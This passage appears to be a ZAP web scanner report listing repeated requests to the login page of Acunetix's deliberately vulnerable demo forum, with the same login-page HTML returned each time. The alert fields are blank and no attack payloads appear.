<a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
